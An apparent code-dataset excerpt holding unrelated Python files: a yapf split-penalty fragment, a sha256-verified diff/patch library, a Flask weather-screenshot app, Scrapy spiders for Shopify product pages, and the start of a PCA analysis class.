# Still allow splitting around the operator.
split_before = ((name.endswith('_test') and
style.Get('SPLIT_BEFORE_LOGICAL_OPERATOR')) or
(name.endswith('_expr') and
style.Get('SPLIT_BEFORE_BITWISE_OPERATOR')))
if split_before:
_SetSplitPenalty(
pytree_utils.LastLeafNode(node.children[1].children[1]), 0)
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[1].children[2]), 0)
# Don't split the ending bracket of a subscript list.
_RecAnnotate(node.children[-1], pytree_utils.Annotation.SPLIT_PENALTY,
VERY_STRONGLY_CONNECTED)
elif name not in {
'arglist', 'argument', 'term', 'or_test', 'and_test', 'comparison',
'atom', 'power'
}:
# Don't split an argument list with one element if at all possible.
subtypes = pytree_utils.GetNodeAnnotation(
pytree_utils.FirstLeafNode(node), pytree_utils.Annotation.SUBTYPE)
if subtypes and format_token.Subtype.SUBSCRIPT_BRACKET in subtypes:
_IncreasePenalty(node, SUBSCRIPT)
# Bump up the split penalty for the first part of a subscript. We
# would rather not split there.
_IncreasePenalty(node.children[1], CONNECTED)
else:
_SetStronglyConnected(node.children[1], node.children[2])
if name == 'arglist':
_SetStronglyConnected(node.children[-1])
self.DefaultNodeVisit(node)
def Visit_power(self, node): # pylint: disable=invalid-name,missing-docstring
# power ::= atom trailer* ['**' factor]
self.DefaultNodeVisit(node)
# When atom is followed by a trailer, we cannot break between them.
# E.g. arr[idx] - no break allowed between 'arr' and '['.
if (len(node.children) > 1 and
pytree_utils.NodeName(node.children[1]) == 'trailer'):
# children[1] itself is a whole trailer: we don't want to
# mark all of it as unbreakable, only its first token: (, [ or .
first = pytree_utils.FirstLeafNode(node.children[1])
if first.value != '.':
_SetUnbreakable(node.children[1].children[0])
# A special case when there are more trailers in the sequence. Given:
# atom tr1 tr2
# The last token of tr1 and the first token of tr2 comprise an unbreakable
# region. For example: foo.bar.baz(1)
# We can't put breaks between either of the '.', '(', or '[' and the names
# *preceding* them.
prev_trailer_idx = 1
while prev_trailer_idx < len(node.children) - 1:
cur_trailer_idx = prev_trailer_idx + 1
cur_trailer = node.children[cur_trailer_idx]
if pytree_utils.NodeName(cur_trailer) != 'trailer':
break
# Now we know we have two trailers one after the other
prev_trailer = node.children[prev_trailer_idx]
if prev_trailer.children[-1].value != ')':
# Set the previous node unbreakable if it's not a function call:
# atom tr1() tr2
# It may be necessary (though undesirable) to split up a previous
# function call's parentheses to the next line.
_SetStronglyConnected(prev_trailer.children[-1])
_SetStronglyConnected(cur_trailer.children[0])
prev_trailer_idx = cur_trailer_idx
# We don't want to split before the last ')' of a function call. This also
# takes care of the special case of:
# atom tr1 tr2 ... trn
# where the 'tr#' are trailers that may end in a ')'.
for trailer in node.children[1:]:
if pytree_utils.NodeName(trailer) != 'trailer':
break
if trailer.children[0].value in '([':
if len(trailer.children) > 2:
subtypes = pytree_utils.GetNodeAnnotation(
trailer.children[0], pytree_utils.Annotation.SUBTYPE)
if subtypes and format_token.Subtype.SUBSCRIPT_BRACKET in subtypes:
_SetStronglyConnected(
pytree_utils.FirstLeafNode(trailer.children[1]))
last_child_node = pytree_utils.LastLeafNode(trailer)
if last_child_node.value.strip().startswith('#'):
last_child_node = last_child_node.prev_sibling
if not (style.Get('INDENT_CLOSING_BRACKETS') or
style.Get('DEDENT_CLOSING_BRACKETS')):
last = pytree_utils.LastLeafNode(last_child_node.prev_sibling)
if last.value != ',':
if last_child_node.value == ']':
_SetUnbreakable(last_child_node)
else:
_SetSplitPenalty(last_child_node, VERY_STRONGLY_CONNECTED)
else:
# If the trailer's children are '()', then make it a strongly
# connected region. It's sometimes necessary, though undesirable, to
# split the two.
_SetStronglyConnected(trailer.children[-1])
def Visit_subscriptlist(self, node): # pylint: disable=invalid-name
# subscriptlist ::= subscript (',' subscript)* [',']
self.DefaultNodeVisit(node)
_SetSplitPenalty(pytree_utils.FirstLeafNode(node), 0)
prev_child = None
for child in node.children:
if prev_child and pytree_utils.NodeName(prev_child) == 'COMMA':
_SetSplitPenalty(pytree_utils.FirstLeafNode(child), 0)
prev_child = child
def Visit_subscript(self, node): # pylint: disable=invalid-name
# subscript ::= test | [test] ':' [test] [sliceop]
_SetStronglyConnected(*node.children)
self.DefaultNodeVisit(node)
def Visit_comp_for(self, node): # pylint: disable=invalid-name
# comp_for ::= 'for' exprlist 'in' testlist_safe [comp_iter]
_SetSplitPenalty(pytree_utils.FirstLeafNode(node), 0)
_SetStronglyConnected(*node.children[1:])
self.DefaultNodeVisit(node)
def Visit_old_comp_for(self, node): # pylint: disable=invalid-name
# Python 3.7
self.Visit_comp_for(node)
def Visit_comp_if(self, node): # pylint: disable=invalid-name
# comp_if ::= 'if' old_test [comp_iter]
_SetSplitPenalty(node.children[0],
style.Get('SPLIT_PENALTY_BEFORE_IF_EXPR'))
_SetStronglyConnected(*node.children[1:])
self.DefaultNodeVisit(node)
def Visit_old_comp_if(self, node): # pylint: disable=invalid-name
# Python 3.7
self.Visit_comp_if(node)
def Visit_test(self, node): # pylint: disable=invalid-name
# test ::= or_test ['if' or_test 'else' test] | lambdef
_IncreasePenalty(node, OR_TEST)
self.DefaultNodeVisit(node)
def Visit_or_test(self, node): # pylint: disable=invalid-name
# or_test ::= and_test ('or' and_test)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, OR_TEST)
index = 1
while index + 1 < len(node.children):
if style.Get('SPLIT_BEFORE_LOGICAL_OPERATOR'):
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), OR_TEST)
else:
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), OR_TEST)
index += 2
def Visit_and_test(self, node): # pylint: disable=invalid-name
# and_test ::= not_test ('and' not_test)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, AND_TEST)
index = 1
while index + 1 < len(node.children):
if style.Get('SPLIT_BEFORE_LOGICAL_OPERATOR'):
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), AND_TEST)
else:
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), AND_TEST)
index += 2
def Visit_not_test(self, node): # pylint: disable=invalid-name
# not_test ::= 'not' not_test | comparison
self.DefaultNodeVisit(node)
_IncreasePenalty(node, NOT_TEST)
def Visit_comparison(self, node): # pylint: disable=invalid-name
# comparison ::= expr (comp_op expr)*
self.DefaultNodeVisit(node)
if len(node.children) == 3 and _StronglyConnectedCompOp(node):
_IncreasePenalty(node.children[1], VERY_STRONGLY_CONNECTED)
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[2]), STRONGLY_CONNECTED)
else:
_IncreasePenalty(node, COMPARISON)
def Visit_star_expr(self, node): # pylint: disable=invalid-name
# star_expr ::= '*' expr
self.DefaultNodeVisit(node)
_IncreasePenalty(node, STAR_EXPR)
def Visit_expr(self, node): # pylint: disable=invalid-name
# expr ::= xor_expr ('|' xor_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, EXPR)
_SetBitwiseOperandPenalty(node, '|')
def Visit_xor_expr(self, node): # pylint: disable=invalid-name
# xor_expr ::= and_expr ('^' and_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, XOR_EXPR)
_SetBitwiseOperandPenalty(node, '^')
def Visit_and_expr(self, node): # pylint: disable=invalid-name
# and_expr ::= shift_expr ('&' shift_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, AND_EXPR)
_SetBitwiseOperandPenalty(node, '&')
def Visit_shift_expr(self, node): # pylint: disable=invalid-name
# shift_expr ::= arith_expr (('<<'|'>>') arith_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, SHIFT_EXPR)
_ARITH_OPS = frozenset({'PLUS', 'MINUS'})
def Visit_arith_expr(self, node): # pylint: disable=invalid-name
# arith_expr ::= term (('+'|'-') term)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, ARITH_EXPR)
_SetExpressionOperandPenalty(node, self._ARITH_OPS)
_TERM_OPS = frozenset({'STAR', 'AT', 'SLASH', 'PERCENT', 'DOUBLESLASH'})
def Visit_term(self, node): # pylint: disable=invalid-name
# term ::= factor (('*'|'@'|'/'|'%'|'//') factor)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, TERM)
_SetExpressionOperandPenalty(node, self._TERM_OPS)
def Visit_factor(self, node): # pylint: disable=invalid-name
# factor ::= ('+'|'-'|'~') factor | power
self.DefaultNodeVisit(node)
_IncreasePenalty(node, FACTOR)
def Visit_atom(self, node): # pylint: disable=invalid-name
# atom ::= ('(' [yield_expr|testlist_gexp] ')'
# '[' [listmaker] ']' |
# '{' [dictsetmaker] '}')
self.DefaultNodeVisit(node)
if (node.children[0].value == '(' and
not hasattr(node.children[0], 'is_pseudo')):
if node.children[-1].value == ')':
if pytree_utils.NodeName(node.parent) == 'if_stmt':
_SetSplitPenalty(node.children[-1], STRONGLY_CONNECTED)
else:
if len(node.children) > 2:
_SetSplitPenalty(pytree_utils.FirstLeafNode(node.children[1]), EXPR)
_SetSplitPenalty(node.children[-1], ATOM)
elif node.children[0].value in '[{' and len(node.children) == 2:
# Keep empty containers together if we can.
_SetUnbreakable(node.children[-1])
def Visit_testlist_gexp(self, node): # pylint: disable=invalid-name
self.DefaultNodeVisit(node)
prev_was_comma = False
for child in node.children:
if isinstance(child, pytree.Leaf) and child.value == ',':
_SetUnbreakable(child)
prev_was_comma = True
else:
if prev_was_comma:
_SetSplitPenalty(pytree_utils.FirstLeafNode(child), TOGETHER)
prev_was_comma = False
def _SetUnbreakable(node):
"""Set an UNBREAKABLE penalty annotation for the given node."""
_RecAnnotate(node, pytree_utils.Annotation.SPLIT_PENALTY, UNBREAKABLE)
def _SetStronglyConnected(*nodes):
"""Set a STRONGLY_CONNECTED penalty annotation for the given nodes."""
for node in nodes:
_RecAnnotate(node, pytree_utils.Annotation.SPLIT_PENALTY,
STRONGLY_CONNECTED)
def _SetExpressionPenalty(node, penalty):
"""Set a penalty annotation on children nodes."""
def RecExpression(node, first_child_leaf):
if node is first_child_leaf:
return
if isinstance(node, pytree.Leaf):
if node.value in {'(', 'for', 'if'}:
return
penalty_annotation = pytree_utils.GetNodeAnnotation(
node, pytree_utils.Annotation.SPLIT_PENALTY, default=0)
if penalty_annotation < penalty:
_SetSplitPenalty(node, penalty)
else:
for child in node.children:
RecExpression(child, first_child_leaf)
RecExpression(node, pytree_utils.FirstLeafNode(node))
def _SetBitwiseOperandPenalty(node, op):
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == op:
if style.Get('SPLIT_BEFORE_BITWISE_OPERATOR'):
_SetSplitPenalty(child, style.Get('SPLIT_PENALTY_BITWISE_OPERATOR'))
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]),
style.Get('SPLIT_PENALTY_BITWISE_OPERATOR'))
def _SetExpressionOperandPenalty(node, ops):
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if pytree_utils.NodeName(child) in ops:
if style.Get('SPLIT_BEFORE_ARITHMETIC_OPERATOR'):
_SetSplitPenalty(child, style.Get('SPLIT_PENALTY_ARITHMETIC_OPERATOR'))
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]),
style.Get('SPLIT_PENALTY_ARITHMETIC_OPERATOR'))
def _IncreasePenalty(node, amt):
"""Increase a penalty annotation on children nodes."""
def RecExpression(node, first_child_leaf):
if node is first_child_leaf:
return
if isinstance(node, pytree.Leaf):
if node.value in {'(', 'for'}:
return
penalty = pytree_utils.GetNodeAnnotation(
node, pytree_utils.Annotation.SPLIT_PENALTY, default=0)
_SetSplitPenalty(node, penalty + amt)
else:
for child in node.children:
RecExpression(child, first_child_leaf)
RecExpression(node, pytree_utils.FirstLeafNode(node))
def _RecAnnotate(tree, annotate_name, annotate_value):
"""Recursively set the given annotation on all leafs of the subtree.
Takes care to only increase the penalty. If the node already has a higher
or equal penalty associated with it, this is a no-op.
Args:
tree: subtree to annotate
annotate_name: name of the annotation to set
annotate_value: value of the annotation to set
"""
for child in tree.children:
_RecAnnotate(child, annotate_name, annotate_value)
if isinstance(tree, pytree.Leaf):
cur_annotate = pytree_utils.GetNodeAnnotation(
tree, annotate_name, default=0)
if cur_annotate < annotate_value:
pytree_utils.SetNodeAnnotation(tree, annotate_name, annotate_value)
def _StronglyConnectedCompOp(op):
if (len(op.children[1].children) == 2 and
pytree_utils.NodeName(op.children[1]) == 'comp_op'):
if (pytree_utils.FirstLeafNode(op.children[1]).value == 'not' and
pytree_utils.LastLeafNode(op.children[1]).value == 'in'):
return True
if (pytree_utils.FirstLeafNode(op.children[1]).value == 'is' and
pytree_utils.LastLeafNode(op.children[1]).value == 'not'):
return True
if (isinstance(op.children[1], pytree.Leaf) and
op.children[1].value in {'==', 'in'}):
return True
return False
def _DecrementSplitPenalty(node, amt):
penalty = pytree_utils.GetNodeAnnotation(
node, pytree_utils.Annotation.SPLIT_PENALTY, default=amt)
penalty = penalty - amt if amt < penalty else 0
_SetSplitPenalty(node, penalty)
def _SetSplitPenalty(node, penalty):
pytree_utils.SetNodeAnnotation(node, pytree_utils.Annotation.SPLIT_PENALTY,
penalty)
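# Usage sketch (assumes yapf's pytree_utils can parse source into a pytree):
#
#     tree = pytree_utils.ParseCodeToTree('x = a + b\n')
#     ComputeSplitPenalties(tree)  # leaves now carry SPLIT_PENALTY annotations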
``` |
{
"source": "1f604/diffpatchlib",
"score": 3
} |
#### File: 1f604/diffpatchlib/diffpatchlib.py
```python
from __future__ import print_function
import difflib
import hashlib
import re
import traceback
import sys
import subprocess
_diff_header_pat = re.compile("^sha256s: ([0-9a-f]+) ([0-9a-f]+)$")
_hdr_pat = re.compile(r"^@@ -(\d+),?(\d+)? \+(\d+),?(\d+)? @@$")
# https://stackoverflow.com/a/44873382
def sha256sum(filename):
"""
Parameters
----------
filename : string
Returns
-------
hex_digest : string
"""
h = hashlib.sha256()
b = bytearray(128*1024)
mv = memoryview(b)
with open(filename, 'rb', buffering=0) as f:
for n in iter(lambda : f.readinto(mv), 0):
h.update(mv[:n])
return h.hexdigest()
def __check_newline_terminated(files):
for filename, lines in files:
if lines[-1][-1] != '\n':
print("ERROR: Missing newline at end of file {} ending in: ".format(filename))
print(lines[-1])
exit(1)
def __make_patch(oldlines, newlines, filename1, filename2):
"""
Get unified string diff between two strings.
Returns empty string if strings are identical.
"""
# ensure strings are newline terminated
__check_newline_terminated(((filename1, oldlines), (filename2, newlines)))
# get the unified diff
diffs = difflib.unified_diff(oldlines, newlines, fromfile=filename1, tofile=filename2, n=0)
# diffs = list(diffs); print(diffs)
return list(diffs)
def __apply_patch(oldlines, patchlines):
"""
Apply unified diff patch to string old to recover newer string.
"""
if not patchlines:
return oldlines
result = []
patch_pointer = 0
old_current_pointer = 0
allowed_line_starts = "@+-"
#for char in allowed_line_starts:
# print("allowed:", char, ord(char))
while patch_pointer < len(patchlines) and patchlines[patch_pointer].startswith(("---","+++")):
patch_pointer += 1 # skip header lines
while patch_pointer < len(patchlines):
# get starting line number from hunk header
m = _hdr_pat.match(patchlines[patch_pointer])
if not m:
print(patchlines)
raise Exception("Cannot process diff")
patch_pointer += 1
old_start_pointer = int(m.group(1))-1 + (m.group(2) == '0')
result.extend(oldlines[old_current_pointer:old_start_pointer])
old_current_pointer = old_start_pointer
# go through hunk
while patch_pointer < len(patchlines) and patchlines[patch_pointer][0] != '@':
if patch_pointer + 1 < len(patchlines) and patchlines[patch_pointer+1][0] not in allowed_line_starts:
print("ERROR: line does not begin with expected symbol:", ord(patchlines[patch_pointer+1][0]), patchlines[patch_pointer+1])
exit(1)
line = patchlines[patch_pointer]
patch_pointer += 1
assert(len(line) > 0)
assert(line[0] in allowed_line_starts)
if line[0] == '+':
result.append(line[1:])
else:
old_current_pointer += 1
result.extend(oldlines[old_current_pointer:])
return result
def __test_patch(a, b, patch):
try:
assert __apply_patch(a, patch) == b
except Exception as e:
print("=== a ===")
print([a])
print("=== b ===")
print([b])
print("=== patch ===")
print([patch])
print("=== a with patch applied ===")
print(__apply_patch(a, patch))
traceback.print_exc()
sys.exit(-1)
def __get_tested_patch(oldlines, newlines, filename1, filename2):
"""
This is the function you want to call 99% of the time.
"""
# first generate the patch
patch = __make_patch(oldlines, newlines, filename1, filename2)
# now test it
__test_patch(oldlines, newlines, patch)
# now return it
return patch
def get_diff(old_lines, new_lines, *, old_filename = "old_file", new_filename = "new_file"):
"""
Parameters
----------
old_lines : [string]
new_lines : [string]
old_filename : string
new_filename : string
Returns
-------
patch_lines : [string]
"""
# with open(filename1) as f:
# old_lines = f.readlines()
# with open(filename2) as f:
# new_lines = f.readlines()
old_hash = sha256sum(old_filename)
new_hash = sha256sum(new_filename)
result = ["sha256s: " + old_hash + " " + new_hash + '\n']
return result + __get_tested_patch(old_lines, new_lines, old_filename, new_filename)
def get_verified_unix_diff(old_filename, new_filename):
"""
Parameters
----------
old_filename : string
new_filename : string
Returns
-------
patch_lines : [string]
"""
old_hash = sha256sum(old_filename)
new_hash = sha256sum(new_filename)
result = ["sha256s: " + old_hash + " " + new_hash + '\n']
try:
subprocess.check_output(['diff', old_filename, new_filename, '-u0'])
result = []
except subprocess.CalledProcessError as e:
if e.returncode != 0 and e.returncode != 1:
raise RuntimeError("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
result += str(e.output, 'utf-8').splitlines(True)
# verify the patch
with open(old_filename) as f:
old_lines = f.readlines()
applied_lines = apply_diff_unchecked(old_lines, result)
check_hash_matches(applied_lines, new_hash)
return result
def get_hashes(patch_filename):
with open(patch_filename) as f:
patch_line = f.readline()
return __get_hashes(patch_line)
def __get_hashes(first_line_of_patch):
m = _diff_header_pat.match(first_line_of_patch)
if not m:
print(first_line_of_patch)
raise Exception("Expected hashes at first line of patch")
return m.group(1), m.group(2)
def apply_diff_unchecked(old_lines, patch_lines):
"""
VERY IMPORTANT: You must manually verify that the results are correct.
This is because the verification functions are slow.
Parameters
----------
old_lines : [string]
patch_lines : [string]
Returns
-------
new_lines : [string]
"""
return __apply_patch(old_lines, patch_lines[1:])
def __apply_diff_verified(old_lines, patch_lines):
"""
Parameters
----------
old_lines : [string]
patch_lines : [string]
Returns
-------
new_lines : [string]
"""
old_hash, new_hash = __get_hashes(patch_lines[0])
check_hash_matches(old_lines, old_hash)
new_lines = __apply_patch(old_lines, patch_lines[1:])
check_hash_matches(new_lines, new_hash)
return new_lines
def check_hash_matches(lines, hash):
contents = ''.join(lines).encode('utf-8')
hash_of_lines = hashlib.sha256(contents).hexdigest()
if hash != hash_of_lines:
raise Exception("Hash of lines does not match the hash supplied")
if __name__ == '__main__':
print("This library provides 4 useful functions:")
print("1. get_verified_unix_diff(old_filename, new_filename)")
print("2. apply_diff_unchecked(old_lines, patch_lines)")
print("3. get_hashes(patch_filename)")
print("4. check_hash_matches(lines, hash)")
``` |
{
"source": "1f9763/web2img",
"score": 3
} |
#### File: 1f9763/web2img/grab.py
```python
from flask import Flask,render_template
from selenium import webdriver
from PIL import Image
import time
import os
import StringIO
import base64
app=Flask(__name__)
@app.route('/getweather')
def getweather():
url='http://www.jma.go.jp/jp/week/347.html'
driver=webdriver.PhantomJS()
driver.set_window_size(1280,800)
driver.get(url)
#----------------------execute js---------------------
jscode='''
document.getElementById("infotablefont").caption.innerHTML='週間天気予報:佐賀県';
'''
driver.execute_script(jscode)
# time.sleep(1)
#----------------------find element-------------------
imgelement=driver.find_element_by_id('infotablefont')
location=imgelement.location
size=imgelement.size
imgelement2=driver.find_element_by_class_name('forecast-bottom')
donesize=imgelement2.size
data=driver.get_screenshot_as_png()
im = Image.open(StringIO.StringIO(data))
left = location['x']
top = location['y']
right = left + size['width']
bottom = location['y'] + size['height']+donesize['height']
im = im.crop((left,top,right,bottom))
output=StringIO.StringIO()
im.save(output,'PNG')
output.seek(0)
output_s = output.read()
b64 = base64.b64encode(output_s)
open("templates/weather.html","w+").write('<img src="data:image/png;base64,{0}"/>'.format(b64))
return render_template('weather.html')
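# Note on the crop box above (a sketch of the arithmetic, not part of the app
# logic): it is (left, top, right, bottom) in page pixels - the element's
# top-left corner from `location`, extended by its own size plus the height of
# the `.forecast-bottom` element, so both blocks land in a single image.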
if __name__=='__main__':
# app.run(host='0.0.0.0',debug=True)
app.run()
``` |
{
"source": "1fabunicorn/SWE_Project",
"score": 2
} |
#### File: SWE_Project/SWE_Project/pipelines.py
```python
from src.ClassEnumeration import ClassEnumeration
class SweProjectPipeline:
enumeration = ClassEnumeration()
def open_spider(self, spider):
self.file = open('items.txt', 'w')
def close_spider(self, spider):
self.file.close()
def process_item(self, item, spider):
if spider.name == 'default':
pass
return item
```
#### File: SWE_Project/spiders/EnnumeratingSpider.py
```python
import scrapy
from scrapy_selenium import SeleniumRequest
from urllib.parse import urlparse, parse_qs, urljoin
from src.ClassEnumeration import ClassEnumeration
from scrapy.utils.response import open_in_browser
class EnnumeratingSpider(scrapy.Spider):
name = 'default'
# allowed_domains = ['www.adoredvintage.com']
enumeration = ClassEnumeration()
urls = [ "https://partakefoods.com", "https://uppercasemagazine.com", "https://www.smartypits.com",
"https://www.manitobah.com", "https://packagefreeshop.com", "https://flourist.com", "https://www.naja.co",
"https://unitedbyblue.com", "https://bailly.co", "https://www.lunchskins.com"
"https://www.givemetap.com", "https://www.silkandwillow.com", "https://www.tazachocolate.com",
"https://www.makergear.com", "https://www.parklandmfg.ca" ]
# urls = ["https://www.givemetap.com"]
def start_requests(self):
for url in self.urls:
yield SeleniumRequest(url=url + "/collections/all", callback=self.parse,
script='window.scrollTo(0,document.body.scrollHeight);')
def parse(self, response):
count = 0
yield {
"url": response.url,
"results": self.enumeration.get(response.css("main")),
"results_all" : self.enumeration.get(response)
}
# for item in response.css(".product-collection__content"):
# count += 1
# yield {
# "name": item.css(".product-collection__content h4 a:first-child::text").get(),
# #"description": item.css(".product-collection__description p::text").get(),
# "price": item.css(".product-collection__price span span::text").get()
# }
        if count > 0:  # Dynamic pagination (only triggers when the item-yield loop above is uncommented)
urlparams = parse_qs(urlparse(response.url).query)
newpage = 2
if "page" in urlparams:
newpage = int(urlparams["page"][0]) + 1
yield response.follow(urljoin(response.url, "?page=" + str(newpage)), callback=self.parse)
# #button = response.css(".pagination span span a::attr(href)").get()
# #if button is not None:
# #yield response.follow(button, callback=self.parse)
```
#### File: SWE_Project/spiders/selenium_spider.py
```python
import scrapy
from scrapy_selenium import SeleniumRequest
class selenium_spider(scrapy.Spider):
name = "selenium"
url = 'https://www.deathwishcoffee.com/collections/coffee'
def start_requests(self):
yield SeleniumRequest(url=self.url, callback=self.parse)
def parse(self, response):
for item in response.css(".product-hero-card__item-title"):
yield {
"content": item.get()
}
```
#### File: SWE_Project/spiders/shopify_molly.py
```python
import scrapy
from scrapy_splash import SplashRequest
from w3lib.http import basic_auth_header
import os
class ShopifyMollySpider(scrapy.Spider):
name = 'shopify_molly'
allowed_domains = ['www.mollyjogger.com']
urls = ['https://www.mollyjogger.com/collections/inventory']
def start_requests(self):
for url in self.urls:
#yield scrapy.Request(url=url, callback=self.parse)
yield SplashRequest(url, self.parse, endpoint='render.html', args={'wait': 2},
splash_headers={'Authorization': basic_auth_header(os.getenv('SPLASH_API_KEY'), '')})
def parse(self, response):
for item in response.css(".product"):
yield {
"name": item.css(".product-title::text").get(),
"price": item.css(".price .money::text").get()
}
``` |
{
"source": "1FengL/faster-rcnn.pytorch",
"score": 3
} |
#### File: 1FengL/faster-rcnn.pytorch/gui.py
```python
from Tkinter import *
from PIL import Image, ImageTk
import os
class mygui():
def __init__(self, image_dir, info_dir):
self.root = Tk()
self.root.title("Surgery Kit Detection")
#self.root.geometry("500x500")
self.find_images(image_dir)
self.find_infos(info_dir)
self.current_image = 0
tkimg1 = self.ShowImg(self.images[self.current_image])
self.PanelA = Label(self.root,image=tkimg1)
self.PanelA.grid(row=0, column=0)
tkimg2 = self.ShowImg(self.dets[self.current_image])
self.PanelB = Label(self.root, image=tkimg2)
self.PanelB.grid(row=0, column=1)
self.text = Label(self.root, text='111')
        self.text.grid(row=3, columnspan=2)
self.BtnPre = Button(self.root, text="Previous", command=self.select_previous)
self.BtnNxt = Button(self.root, text="Next", command=self.select_next)
self.BtnPre.grid(row=1, column=0, columnspan=2)
self.BtnNxt.grid(row=2, column=0, columnspan=2)
self.root.mainloop()
def find_images(self, image_dir):
self.images = []
self.dets = []
for currentName in os.listdir(image_dir):
if 'det' in currentName:
self.dets.append(os.path.join(image_dir, currentName))
else:
self.images.append(os.path.join(image_dir, currentName))
def find_infos(self, info_dir):
self.infos = []
cnt = -1
for f_name in os.listdir(info_dir):
if "info" in f_name:
cnt += 1
self.infos.append([])
with open(os.path.join(info_dir, f_name)) as f:
for line in f:
a,b,c,d = line.strip().split("+")
self.infos[cnt].append([a,b,c,d])
def ShowImg(self, img_dir):
return ImageTk.PhotoImage(Image.open(img_dir))
def refreshing(self):
tkimg1 = self.ShowImg(self.images[self.current_image])
self.PanelA.configure(image=tkimg1)
self.PanelA.image = tkimg1
tkimg2 = self.ShowImg(self.dets[self.current_image])
self.PanelB.configure(image=tkimg2)
self.PanelB.image = tkimg2
def select_previous(self):
if self.current_image > 0:
self.current_image -= 1
self.refreshing()
def select_next(self):
if self.current_image < len(self.images)-1:
self.current_image += 1
self.refreshing()
if __name__ == '__main__':
mygui = mygui("images", "images")
``` |
{
"source": "1feres1/pynmranalysis",
"score": 3
} |
#### File: pynmranalysis/pynmranalysis/analysis.py
```python
import numpy as np
from sklearn.base import TransformerMixin, BaseEstimator, ClassifierMixin, clone, RegressorMixin
from sklearn import metrics
from numpy import interp
import pandas as pd
from sklearn.model_selection import KFold
from sklearn.cross_decomposition import PLSRegression
from copy import deepcopy
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from scipy.stats import f
#####################################################################################
class PyPCA(BaseEstimator):
"""
    PyPCA object - wrapper for sklearn.decomposition PCA algorithms for omics data analysis
    :param pca_algorithm: the underlying sklearn PCA instance
    :type pca_algorithm: PCA implementation of sklearn
    :param n_comps: number of PCA components (default 2)
    :type n_comps: int
    :param loadings: the coefficients of the linear combination of the original variables from which the principal components (PCs) are constructed.
    :type loadings: data matrix
    :param isfitted: indicates whether the model is fitted or not (default False)
    :type isfitted: bool
    :param scores: the scores of the PCA model
    :type scores: numpy array
    :param m_params: the model result parameters (default None)
    :type m_params: dict
"""
def __init__(self, n_comps=2, scaler=StandardScaler()):
"""Constructor method
"""
        # Perform the check with isinstance but avoid abstract base classes. PCA needs the number of comps anyway!
        pca = PCA(n_components=n_comps)
        assert isinstance(scaler,
                          TransformerMixin) or scaler is None, "scaler must be an sklearn transformer-like or None"
        # initialize variables
self.pca_algorithm = pca
self.n_comps = n_comps
self.scaler = scaler
self.loadings = None
self.isfitted = False
self.scores = None
self.m_params = None
def transform(self, x):
"""
        get the projection of the data matrix x on the principal components of PCA
        :param x: data matrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return: PCA projections (x scores)
:rtype: numpy.ndarray, shape [n_samples, ncomps]
:raise ValueError: If there are problems with the input or during model fitting.
"""
try:
if self.scaler is not None:
xscaled = self.scaler.transform(x)
return self.pca_algorithm.transform(xscaled)
else:
return self.pca_algorithm.transform(x)
except ValueError as ver:
raise ver
def _residual_ssx(self, x):
"""
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :return: RSS, the residual sum of squares per sample
        :rtype: numpy.ndarray
"""
pred_scores = self.transform(x)
x_reconstructed = self.scaler.transform(self.inverse_transform(pred_scores))
xscaled = self.scaler.transform(x)
residuals = np.sum((xscaled - x_reconstructed) ** 2, axis=1)
return residuals
def inverse_transform(self, scores):
"""
inverse transformation of x score data to the original data before projection
        :param scores: the projections (x scores) (rows : samples , columns : principal components)
        :return: data matrix in the original space (rows : samples , columns : variables )
        :rtype: numpy.ndarray
"""
# Scaling check for consistency
if self.scaler is not None:
xinv_prescaled = self.pca_algorithm.inverse_transform(scores)
xinv = self.scaler.inverse_transform(xinv_prescaled)
return xinv
else:
return self.pca_algorithm.inverse_transform(scores)
def fit_transform(self, x):
"""
        Fit the model and return the x scores (rows : samples , columns : principal components)
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :return: PCA projections (x scores) after transforming x
:rtype: numpy.ndarray, shape (n_samples, n_comps)
:raise ValueError: If there are problems with the input or during model fitting.
"""
try:
self.fit(x, )
return self.transform(x)
except ValueError as ver:
raise ver
def fit(self, x):
"""
Perform model fitting on the provided x data matrix and calculate basic goodness-of-fit metrics.
        :param x: data matrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:raise ValueError: If any problem occurs during fitting.
"""
try:
# check if we will use scaling or not for PCA
if self.scaler is not None:
xscaled = self.scaler.fit_transform(x)
self.pca_algorithm.fit(xscaled)
self.scores = self.pca_algorithm.transform(xscaled)
ss = np.sum((xscaled - np.mean(xscaled, 0)) ** 2)
predicted = self.pca_algorithm.inverse_transform(self.scores)
rss = np.sum((xscaled - predicted) ** 2)
else:
self.pca_algorithm.fit(x, )
self.scores = self.pca_algorithm.transform(x)
ss = np.sum((x - np.mean(x, 0)) ** 2)
predicted = self.pca_algorithm.inverse_transform(self.scores)
rss = np.sum((x - predicted) ** 2)
            # set model parameters
self.m_params = {'R2X': 1 - (rss / ss), 'VarExp': self.pca_algorithm.explained_variance_,
'VarExpRatio': self.pca_algorithm.explained_variance_ratio_}
# For "Normalised" DmodX calculation
resid_ssx = self._residual_ssx(x)
s0 = np.sqrt(resid_ssx.sum() / ((self.scores.shape[0] - self.n_comps - 1) * (x.shape[1] - self.n_comps)))
self.m_params['S0'] = s0
# set loadings
